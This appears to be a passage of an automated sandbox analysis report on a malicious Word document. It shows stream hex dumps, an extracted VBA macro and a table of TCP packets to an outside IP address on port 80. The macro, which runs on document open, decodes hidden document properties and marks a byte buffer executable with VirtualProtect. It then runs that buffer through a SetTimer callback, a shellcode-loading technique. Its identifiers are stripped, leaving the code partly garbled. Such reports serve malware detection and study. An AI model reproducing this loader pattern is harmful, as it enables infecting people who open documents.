                                                Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n q . . . . . . . L i b " u s e . r 3 2 " A l i . a s " K i l l . T i m e r " ( B y V a l . . . ! . . . . A s L o n g . 3 , . . % . . .
                                                Data Raw:01 b0 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                VBA Code
                                                Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 8
    End Function
Function ()
     = 0
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((laMT7W1FQ9("Dbl_z8FQA")).Value)
    Else
         = ((laMT7W1FQ9("S69tN3D")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(laMT7W1FQ9("WbohhHuqGZ")) = laMT7W1FQ9("ncJln8aIych")
         = (0, , 1, )
     1
     0, 
    ().Remove (laMT7W1FQ9("Szjwykb2"))
    ().Remove (laMT7W1FQ9("rqOurs0Au"))
    ReDim (1)
End Sub
Function (, )
     = Mid(,  + 1, 1)
End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 5
    End Function
Function ()
     = 2
    End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Public Function laMT7W1FQ9(strInput)
        laMT7W1FQ9 = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function ()
     = 10
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 4
    End Function
Function ()
     = 3
    End Function
Function ()
     = 1
    End Function
Function ()
     = 11
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = laMT7W1FQ9("aDCvPYmsAe") & laMT7W1FQ9("CorCfK97l")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 6
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 9
    End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 7
    End Function

                                                Streams

                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 357
                                                General
                                                Stream Path:PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:357
                                                Entropy:5.294641930282945
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 4 E 2 6 9 6 0 2 - 6 6 5 D - 4 2 2 2 - B 7 8 C - 9 7 E 2 A 8 5 B 8 E C B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 8 A A 7 2 8 0 7 6 8 0 7 6 8 0 7 6 8 0 7 6 " . . D P B = " 5 0 5 2 8 A 2 D 8 B 2 D 8 B 2 D " . . G C = " F 8 F A 2 2 D 5 2 3 D 5 2 3 2 A " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
                                                Data Raw:49 44 3d 22 7b 34 45 32 36 39 36 30 32 2d 36 36 35 44 2d 34 32 32 32 2d 42 37 38 43 2d 39 37 45 32 41 38 35 42 38 45 43 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                                                General
                                                Stream Path:PROJECTwm
                                                File Type:data
                                                Stream Size:41
                                                Entropy:3.0773844850752607
                                                Base64 Encoded:False
                                                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                General
                                                Stream Path:VBA/_VBA_PROJECT
                                                File Type:ISO-8859 text, with no line terminators
                                                Stream Size:7
                                                Entropy:1.8423709931771088
                                                Base64 Encoded:False
                                                Data ASCII:a . . .
                                                Data Raw:cc 61 ff ff 00 00 00
                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5116
                                                General
                                                Stream Path:VBA/__SRP_2
                                                File Type:data
                                                Stream Size:5116
                                                Entropy:1.9333763372676134
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724
                                                General
                                                Stream Path:VBA/__SRP_3
                                                File Type:data
                                                Stream Size:2724
                                                Entropy:2.697647710097881
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . ` . ! . . . . . . . . . . . \\ . . p . . . . . . A . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 d1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: VBA/dir, File Type: data, Stream Size: 486
                                                General
                                                Stream Path:VBA/dir
                                                File Type:data
                                                Stream Size:486
                                                Entropy:6.299483290874555
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . N G d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . L m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
                                                Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 4e 47 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 11, 2022 17:27:53.037703037 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.141216040 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.141383886 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.142085075 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.245167971 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262594938 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262634039 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262659073 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262682915 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262706995 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262732029 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262754917 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262779951 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262784958 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.262804031 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262805939 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.262818098 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.262897015 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.262922049 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.262933016 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.267369986 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366070986 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366111994 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366137028 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366161108 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366183996 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366206884 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366210938 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366225958 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366230965 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366250992 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366266966 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366282940 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366290092 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366295099 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366311073 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366313934 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366327047 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366337061 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366345882 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366362095 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366385937 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366391897 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366408110 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366410017 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366424084 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366431952 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366442919 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366453886 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366463900 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366478920 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366492987 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366501093 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366511106 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366523981 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.366528034 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366559982 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.366972923 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.472717047 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472764969 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472784042 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472800016 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472817898 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472834110 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472850084 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472867012 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472883940 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472899914 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472909927 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.472924948 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.472942114 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.472959042 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.472979069 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.472995996 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473012924 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473020077 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473030090 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473037004 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473045111 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473053932 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473062038 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473071098 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473078966 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473088026 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473095894 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473103046 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473123074 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473135948 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473181963 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473197937 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473213911 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473218918 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473233938 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473241091 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473251104 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473267078 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473278046 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473283052 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473294973 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473306894 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473319054 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473324060 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473340988 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473345995 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473356962 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473362923 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473372936 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473386049 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473388910 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473411083 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473419905 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473427057 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473444939 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473463058 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473465919 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473479033 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473485947 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473496914 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473503113 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473512888 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473525047 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473530054 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473545074 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473546982 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473561049 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.473565102 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473583937 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.473602057 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.474009037 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.576881886 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.576931953 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.576950073 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.576965094 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.576982021 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.576997995 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577013969 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577028990 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577030897 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577049017 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577059984 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577064037 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577066898 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577084064 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577085018 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577100992 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577105999 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577117920 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577120066 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577133894 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577136993 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577150106 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577152967 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577167034 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577172041 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577189922 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577205896 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577459097 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577481031 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577502012 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577502966 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577522039 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577524900 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577538967 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577548027 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577558041 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577573061 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577584982 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577594995 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577606916 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577619076 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577639103 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577641010 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577658892 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577661991 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577683926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577697039 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577707052 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577714920 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577730894 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577743053 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577755928 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577769995 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577779055 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577790022 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577800035 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577811956 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577822924 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577836037 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577846050 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577853918 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577872038 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577883005 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577894926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577913046 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577929974 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577933073 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577951908 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577970028 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577971935 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.577975988 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.577992916 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578000069 CEST804917145.8.146.139192.168.2.22
